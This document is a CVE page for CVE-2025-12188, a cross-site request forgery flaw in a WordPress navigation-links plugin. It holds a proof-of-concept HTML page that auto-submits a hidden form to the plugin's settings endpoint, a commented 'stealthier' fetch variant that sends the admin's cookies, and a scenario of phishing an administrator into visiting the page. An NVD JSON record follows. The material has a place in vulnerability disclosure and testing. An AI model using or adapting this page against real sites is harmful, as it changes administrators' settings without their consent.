CVE-2025-12188

<!-- CSRF PoC for CVE-2025-12188 --> <!-- Target: WordPress Posts Navigation Links plugin settings page --> <!DOCTYPE html> <html> <head> <title>CSRF Attack PoC - CVE-2025-12188</title> </head> <body> <h1>CSRF PoC for CVE-2025-12188</h1> <p>This PoC demonstrates the CSRF vulnerability in WordPress plugin:</p> <p>Posts Navigation Links for Sections and Headings - Free by WP Masters</p> <form id="csrfForm" action="http://target-wordpress-site/wp-admin/admin.php?page=wpm_navigation_links_settings" method="POST" enctype="application/x-www-form-urlencoded"> <!-- Plugin settings fields - attacker controlled --> <input type="hidden" name="wpm_navigation_links_option" value="some_malicious_value"> <input type="hidden" name="submit" value="Save Changes"> <!-- Missing or bypassed nonce validation --> </form> <script> // Auto-submit form when page loads document.getElementById('csrfForm').submit(); // Alternatively, use fetch API for more stealthy attack /* fetch('http://target-wordpress-site/wp-admin/admin.php?page=wpm_navigation_links_settings', { method: 'POST', credentials: 'include', headers: { 'Content-Type': 'application/x-www-form-urlencoded', }, body: 'wpm_navigation_links_option=malicious_value&submit=Save+Changes' }); */ </script> <p>If you see this message, the attack has been executed.</p> </body> </html> <!-- Attack Scenario: 1. Attacker creates this malicious HTML page 2. Tricks WordPress admin into visiting the page (e.g., via phishing email) 3. Browser automatically submits the form with admin's session cookies 4. Since nonce validation is missing/broken, server accepts the request 5. Plugin settings are modified without admin's consent -->

{"cve": {"id": "CVE-2025-12188", "sourceIdentifier": "[email protected]", "published": "2025-11-04T05:16:10.980", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Posts Navigation Links for Sections and Headings – Free by WP Masters plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.1. This is due to missing or incorrect nonce validation on the 'wpm_navigation_links_settings' page. This makes it possible for unauthenticated attackers to update the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://wordpress.org/plugins/posts-navigation-links-for-sections-and-headings-free-by-wp-masters/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/05f73a26-f637-4a1a-9f8c-98be8a146f00?source=cve", "source": "[email protected]"}]}}